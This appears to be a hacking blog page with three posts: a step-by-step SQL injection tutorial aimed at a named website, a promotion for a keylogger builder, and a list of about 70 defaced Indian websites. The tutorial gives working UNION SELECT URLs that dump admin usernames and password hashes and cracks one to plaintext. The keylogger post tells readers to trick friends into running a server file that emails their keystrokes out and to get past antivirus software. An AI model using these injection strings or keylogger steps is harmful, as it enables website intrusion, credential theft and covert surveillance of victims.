KUNJUNGI WEB SAYA

SQL Injection | Step by Step deface website

What is SQL injection ?
SQL stands for Structured Query Language. It is very high level language,I mean close to humans.
Like SELECT,INSERT,DELETE,UPDATE queries are used to select,add data,delete data,update data
respectively.SQL is used to
design the databses. The information is stored in databses.
SQL injection is the vulnerability occuring in database layer of application which allow attacker to see
the contents stored in database. This vulnerabilty occures when the user's input is not filtered or
improperly filtered.Example the webpages links in format 
www.anything.com/something.php?something=something, example 
www.tartanarmy.com/news/news.php?id=130.
Here we are passing 130 to database and it returns the results accordingly. Lets attach a single quote at the end (') that is
www.tartanarmy.com/news/news.php?id=130'
and we got an error on the screen because it included the single quote (') while processing the results. It assures us that it didn't filter our input and is vulnerable to attack.


Some basics-:
Every database server has databases on it. Every database has tables in it, tables have columns in it and finally data is stored in columns.



  


We Have chosen database "explore_hacking" from six databases. Its has four tables admin,articles,products,subscribers. Each table has further columns and data stored in them . For example we chose 'admin' table, it has columns id,username,password,email.

 What is information_schema ?
It is information database present in all SQL database severs(version>5) by default. It contains
information like names of tables,columns present in all other databases. 

We have opened database "information_schema" which is present by default and the table named as "TABLES" in database.





SQL Injection Tutorial :- 
 This tutorial is only for educational purposes. Kindly do not misuse it.
Log on to http://www.tartanarmy.com/news/news.php?id=130. Basically we are going to send the queries through URL to get back results on screen accordingly. The motive is to get name of table, name of colmun in which usernames and passwords are stored and finally fetching them. Instead of copying and pasting the long links, simply click on "click here" and open in new tab.

Step1.Find number of columns.
Lets use "ORDER BY" clause here, it is used to sort the columns.Choose any number, 
say 10. Here I have assumed that number columns cant be more then 10."--" is used for making anything after it comment.
Now go to this URL
http://www.tartanarmy.com/news/news.php?id=130 order by 10-- Click here
Actually we instructed it sort the result by 10th column. But it returned us with an error,this
means number of columns are less then 10. Lets replace it with 9.

http://www.tartanarmy.com/news/news.php?id=130 order by 9. But again we got an error. This
means number of columns are less than 9. Like this we keep on moving, until we dont get any error.
Finally we reach on '6'
http://www.tartanarmy.com/news/news.php?id=130 order by 6--
we didn't get any error, this means there are 6 colums.

Step 2.Find vulnerable columns.
Now lets use "UNION ALL" and "SELECT" command. Remember to put dash (-) before 130.
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,2,3,4,5,6--. Click here
We would get a couple of numbers on screen. The bold ones are the most vulnerable columns.
In this case the most vulnerable is number 2.



Step 3. Find database version.
Replace the most vulnerable column with "@@version" or "verson()" (if first one doesn't work).
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,@@version,3,4,5,6-- Click here
We got the version on screen. It is. The only thing to note is that version is 5 point something that
is greater than 5. We would have followed some other approach in case the version would be
less than 5 because there is no database by default like "information_schema" which stores information about tables/columns of other databases. in version less than 5.

Step 4. Finding table names.
Replace vulnerable column no. with "table_name".
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,table_name,3,4,5,6 from  
 information_schema.tables where table_schema=database()--
 Click here
We got first table name on the screen.

To get all tables use group_concat
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(table_name),3,4,5,6 from information_schema.tables where                                             table_schema=database()-- Click here

Step 5.Finding column names.
Simlary get all the columns by simply replacing 'table' with 'column'
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(column_name),3,4,5,6 from 
information_schema.columns where table_schema=database()-- 
Click here
There is a repeating element like in this case is 'id' .From it, we come to know which table number
has which columns. 


Step 6.Fetching data from columns. 
We can fetch the data stored in any column. But the interesting ones here are username and password.
These columns are in first table that is tar_admin. "0x3a" is used simply to insert a colon in result  to separate it, it is hex of colon.

http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(username,0x3a,password),3,4,5,6 from tar_admin--. Click Here

So finally we got the usernames and passwords on screen. But passwords are encrypted.
Mostly these encryptions are crackable. Lets choose any username say 
"Sneds". The password in encrypted form is 7d372d3f4ad3116c9e455b20e946dd15 .Lets logon to http://md5crack.com/crackmd5.php and put the hashed(encrypted) password here.
And it would crack for us. We got 'oorwullie' in result ( password in clear text).


Note:Hashes are type of encryptions which are irreversible.  There are numberless online crackers  available. Keep trying. Sometimes very strong hashes can not be cracked. 
Where is the login panel or login page of website ?
So you got the key, where is lock now ? Most of the websites have login pages at default locations.
There is any website, say www.xyz.com. The login page would be at
www.xyz.com/admin , www.xyz.com/administrator , www.xyz.com/adminlogin etc.
Download this admin page finder from here and it would try all these default pages.


admin devilsonline : Ok.... good luck 

KEYLOGGER SIMPLE 2011

KEYLOGGER SIMPLE 2011

Simple Keylogger recoded by


hack anyone's online email account.I have provided download details in the post below.

What is a Keylogger???


If you are a noob and don't know what keylogging is all about, then read this section.

Using keylogger Builder, you can create a "server" file. You have to send this file to your friend and make him run this server file on his computer. Once he runs your file on his computer, server installs itself in background and starts monitoring all typed keystrokes on his computer. Also, server starts sending all these typed keystrokes to you in your mailbox. Since, these keystrokes contain victim's passwords, you are able to see those passwords and you can easily hack your friend's email accounts.

How to use UD Simple Keylogger:


1. Download UD Keylogger to hack email account password.
Password: techotoys.blogspot.com (Since this is my first release, I am not encrypting password).

2. Run the Builder.exe file on your computer to see:

Simple keylogger to hack friends email account

3. Enter information as follows:

Username: Your Gmail id where you want to receive your friend's passwords.
Password: Your Gmail password.
Interval: The time span (in minutes) between two emails. The minimum value is 5. You can set it to whatever you want.

4. After completing step 3, hit on "Test Mail" to check whether you have entered correct login information. After you get a message like "Your Gmail works", hit on "Build" to get the server - "done.exe" file. It will be created in your current directory.

Note: Here, "done.exe" is our server file.

Scan report:

Virus scan report

As you can see, the server is currently 4/10 and is undetectable to Kaspersky, AVG and Avast which are popular AVs. If you want to make this FUD (Fully UnDetectable), use Crypter software or refer my articles in Undetection Techniques section.

5. You have to send this done.exe file to your friend and make him run this file on his computer. You can use Binder to bind this server file to any other .exe file.

6. Once he runs your file on his computer, you will start receiving all his keystrokes in your mailbox as shown:


That's it friends. Since, these keystrokes contain passwords too, you can now easily hack your friends online email accounts.

Bugs and desired improvements:

1. This keylogger records 90% accurate keystrokes. Also, it is having problems with special characters.
2. It is UD and not FUD.
3. Requires more features like add to startup, melt, injection.

These are the features which I will be adding in second version of this keylogger ie Simple Keylogger v 2.0

If you have any other feature suggestion, please leave your feedback in comments.

Note: Your antivirus may go mad after creation of "done.exe" file. Don't worry, it is not a virus, but a hacktool and hence detectable to antiviruses. It is recommended to use Deep Freeze software to prevent your computer from any possible harm.

Credits: This keylogger is designed and recoded by me. I would like to thank Soul Collector for his valuable help and source.

So friends, this was all about UD Simple Keylogger. I will be back with more stable second version of this Simple Keylogger. If you have any problem in using thisUD Simple Keylogger,please mention it in comments.

Enjoy Hacking... 

thanks to >>  techotoys.blogspot.com 

Hacker World : 70 Indian Websites Hacked By Shadow008 (PakCyberArmy)

Hacker World : 70 Indian Websites Hacked By Shadow008 (PakCyberArmy)

  1. 70 Indian Websites Hacked By Shadow008 (PakCyberArmy)
  2.  
  3. http://ajitsdutta.com/cgi-sys/suspendedpage.cgi
  4. http://alamconstruction.com/cgi-sys/suspendedpage.cgi
  5. http://ambicagoldplace.in/cgi-sys/suspendedpage.cgi
  6. http://aspiregroup.co.in/cgi-sys/suspendedpage.cgi
  7. http://atmiyavidyapeeth.eu/cgi-sys/suspendedpage.cgi
  8. http://avikasgor.in/cgi-sys/suspendedpage.cgi
  9. http://balajigroup.org/cgi-sys/suspendedpage.cgi
  10. http://bharatroadwayscorporation.com...pendedpage.cgi
  11. http://bmauto.in/cgi-sys/suspendedpage.cgi
  12. http://breezeairconinf.com/cgi-sys/suspendedpage.cgi
  13. http://citycollection.in/cgi-sys/suspendedpage.cgi
  14. http://dakshina.co.in/cgi-sys/suspendedpage.cgi
  15. http://deepfacility.com/cgi-sys/suspendedpage.cgi
  16. http://drrajgor.com/cgi-sys/suspendedpage.cgi
  17. http://eagleenterprises.in/cgi-sys/suspendedpage.cgi
  18. http://eccentricsolutions.in/cgi-sys/suspendedpage.cgi
  19. http://ebposervices.in/cgi-sys/suspendedpage.cgi
  20. http://everestship.com/cgi-sys/suspendedpage.cgi
  21. http://festinagarments.com/cgi-sys/suspendedpage.cgi
  22. http://geetaenterprise.com/cgi-sys/suspendedpage.cgi
  23. http://globaldetective.co.in/cgi-sys/suspendedpage.cgi
  24. http://goahotelmanagementcollege.com...pendedpage.cgi
  25. http://gsmindia.org/cgi-sys/suspendedpage.cgi
  26. http://humanitygroup.co.in/cgi-sys/suspendedpage.cgi
  27. http://industrialflooring.co.in/cgi-...pendedpage.cgi
  28. http://ishaenterprises.com/cgi-sys/suspendedpage.cgi
  29. http://knots.ws/cgi-sys/suspendedpage.cgi
  30. http://komalshipways.com/cgi-sys/suspendedpage.cgi
  31. http://kutchirajgor.com/cgi-sys/suspendedpage.cgi
  32. http://lotusdetective.com/cgi-sys/suspendedpage.cgi
  33. http://malabarandkeralastudies.net/c...pendedpage.cgi
  34. http://malaikaappliances.com/cgi-sys/suspendedpage.cgi
  35. http://manavtagroup.in/cgi-sys/suspendedpage.cgi
  36. http://manpowerservice.in/cgi-sys/suspendedpage.cgi
  37. http://medicalhelpaifosbs.in/cgi-sys/suspendedpage.cgi
  38. http://microlangroups.in/cgi-sys/suspendedpage.cgi
  39. http://mipharma.co.in/cgi-sys/suspendedpage.cgi
  40. http://nscpl.co.in/cgi-sys/suspendedpage.cgi
  41. http://oomphz.com/cgi-sys/suspendedpage.cgi
  42. http://orangelogistic.com/cgi-sys/suspendedpage.cgi
  43. http://paradisejuice.net/cgi-sys/suspendedpage.cgi
  44. http://pleasantweb.in/cgi-sys/suspendedpage.cgi
  45. http://poojatimber.com/cgi-sys/suspendedpage.cgi
  46. http://poonam-industries.com/cgi-sys/suspendedpage.cgi
  47. http://porchae.com/cgi-sys/suspendedpage.cgi
  48. http://prodental.in/cgi-sys/suspendedpage.cgi
  49. http://prodigylife.com/cgi-sys/suspendedpage.cgi
  50. http://rajgor.co.in/cgi-sys/suspendedpage.cgi
  51. http://rajrubber.com/cgi-sys/suspendedpage.cgi
  52. http://rookna.com/cgi-sys/suspendedpage.cgi
  53. http://rubybhatia.com/cgi-sys/suspendedpage.cgi
  54. http://rusmedexports.com/cgi-sys/suspendedpage.cgi
  55. http://safashipping.com/cgi-sys/suspendedpage.cgi
  56. http://sareenpharma.com/cgi-sys/suspendedpage.cgi
  57. http://sbengred.com/cgi-sys/suspendedpage.cgi
  58. http://shivamlogistics.com/cgi-sys/suspendedpage.cgi
  59. http://shreemahalaxmidevelopers.com/...pendedpage.cgi
  60. http://shreeodhavrammandap.com/cgi-s...pendedpage.cgi
  61. http://shreespjaincollege.com/cgi-sys/suspendedpage.cgi
  62. http://shreesunpharma.com/cgi-sys/suspendedpage.cgi
  63. http://shriyashtutorials.com/cgi-sys/suspendedpage.cgi
  64. http://shwetcomputers.com/cgi-sys/suspendedpage.cgi
  65. http://soulherbalfarm.com/cgi-sys/suspendedpage.cgi
  66. http://subhralife.com/cgi-sys/suspendedpage.cgi
  67. http://sufis.in/cgi-sys/suspendedpage.cgi
  68. http://svmcontractconsultants.com/cg...pendedpage.cgi
  69. http://swaminarayandevelopers.in/cgi...pendedpage.cgi
  70. http://thomsonandthomsons.com/cgi-sys/suspendedpage.cgi
  71. http://visualeducation.in/cgi-sys/suspendedpage.cgi
  72. http://vivangroup.in/cgi-sys/suspendedpage.cgi
  73.  
  74.  
  75. Mirror:
  76. http://zone-h.com/mirror/id/13440756
  77. http://zone-h.com/mirror/id/13440753
  78. http://zone-h.com/mirror/id/13440754
  79. http://zone-h.com/mirror/id/13440755
  80. http://zone-h.com/mirror/id/13440748
  81. http://zone-h.com/mirror/id/13440749
  82. http://zone-h.com/mirror/id/13440749
  83. http://zone-h.com/mirror/id/13440750
  84. http://zone-h.com/mirror/id/13440751
  85. http://zone-h.com/mirror/id/13440752
  86. http://zone-h.com/mirror/id/13440744
  87. http://zone-h.com/mirror/id/13440745
  88. http://zone-h.com/mirror/id/13440746
  89. http://zone-h.com/mirror/id/13440747
  90. http://zone-h.com/mirror/id/13440741
  91. http://zone-h.com/mirror/id/13440742
  92. http://zone-h.com/mirror/id/13440743
  93. http://zone-h.com/mirror/id/13440738
  94. http://zone-h.com/mirror/id/13440739
  95. http://zone-h.com/mirror/id/13440740
  96. http://zone-h.com/mirror/id/13440733
  97. http://zone-h.com/mirror/id/13440734
  98. http://zone-h.com/mirror/id/13440735
  99. http://zone-h.com/mirror/id/13440736
  100. http://zone-h.com/mirror/id/13440737
  101. http://zone-h.com/mirror/id/13440729
  102. http://zone-h.com/mirror/id/13440730
  103. http://zone-h.com/mirror/id/13440731
  104. http://zone-h.com/mirror/id/13440732
  105. http://zone-h.com/mirror/id/13440726
  106. http://zone-h.com/mirror/id/13440724
  107. http://zone-h.com/mirror/id/13440725
  108. http://zone-h.com/mirror/id/13440727
  109. http://zone-h.com/mirror/id/13440728
  110. http://zone-h.com/mirror/id/13440719
  111. http://zone-h.com/mirror/id/13440720
  112. http://zone-h.com/mirror/id/13440721
  113. http://zone-h.com/mirror/id/13440722
  114. http://zone-h.com/mirror/id/13440723
  115. http://zone-h.com/mirror/id/13440716
  116. http://zone-h.com/mirror/id/13440717
  117. http://zone-h.com/mirror/id/13440718
  118. http://zone-h.com/mirror/id/13440711
  119. http://zone-h.com/mirror/id/13440712
  120. http://zone-h.com/mirror/id/13440713
  121. http://zone-h.com/mirror/id/13440714
  122. http://zone-h.com/mirror/id/13440715
  123. http://zone-h.com/mirror/id/13440707
  124. http://zone-h.com/mirror/id/13440708
  125. http://zone-h.com/mirror/id/13440709
  126. http://zone-h.com/mirror/id/13440710
  127. http://zone-h.com/mirror/id/13440702
  128. http://zone-h.com/mirror/id/13440703
  129. http://zone-h.com/mirror/id/13440704
  130. http://zone-h.com/mirror/id/13440705
  131. http://zone-h.com/mirror/id/13440706
  132. http://zone-h.com/mirror/id/13440700
  133. http://zone-h.com/mirror/id/13440701
  134.  
  135. Source Link:
  136. http://www.PakCyberArmy.net
  137. http://www.HackAll.net